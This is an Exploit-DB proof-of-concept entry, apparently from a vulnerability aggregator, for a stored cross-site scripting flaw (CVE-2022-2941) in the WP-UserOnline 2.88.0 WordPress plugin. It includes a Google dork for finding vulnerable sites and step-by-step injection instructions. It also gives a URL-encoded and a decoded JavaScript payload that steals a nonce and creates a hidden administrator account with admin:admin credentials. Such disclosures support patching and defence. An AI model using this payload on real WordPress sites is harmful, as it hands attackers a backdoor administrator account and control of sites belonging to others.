Lucene search
Onur GöğebakanEDB-ID:52048HistoryJun 14, 2024 - 12:00 a.m.
WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
2024-06-1400:00:00
Onur Göğebakan
www.exploit-db.com
71
wordpress
stored xss
vulnerability
administrator
exploit
5.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
7.4 High
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
62.0%
# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2024-06-12
# Exploit Author: Onur Göğebakan
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: WordPress 6.5.4 - Windows 10
# CVE : CVE-2022-2941
# Explanation:
A new administrator user can be added to WordPress using a stored XSS vulnerability.
# Exploit:
1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
2. Click Save and intercept the request.
3. Change `naming%5Bbots%5D` parameter value with belowed payload
```
%3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
```
4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline
5. Administrator user added with admin:admin credentials.
# Decoded payload
```
function handleResponse() {
var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('POST', '/wp-admin/user-new.php', true);
changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var params = 'action=createuser&_wpnonce_create-user=' + nonce +
'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
'&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
changeReq.send(params);
}
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/wp-admin/user-new.php', true);
req.send();
```Related
patchstack
patchstack
zdt
zdt
packetstorm
packetstorm
WordPress WP-UserOnline 2.88.0 Cross Site Scripting
2022-09-23 00:00:00
cvelist
cvelist
CVE-2022-2941
2022-09-06 17:19:00
cve
cve
CVE-2022-2941
2022-09-06 18:15:15
prion
prion
Cross site scripting
2022-09-06 18:15:00
osv
osv
CVE-2022-2941
2022-09-06 18:15:15
nvd
nvd
CVE-2022-2941
2022-09-06 18:15:15
exploitdb
exploitdb
Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
2022-09-23 00:00:00
5.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
7.4 High
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
62.0%
Related for EDB-ID:52048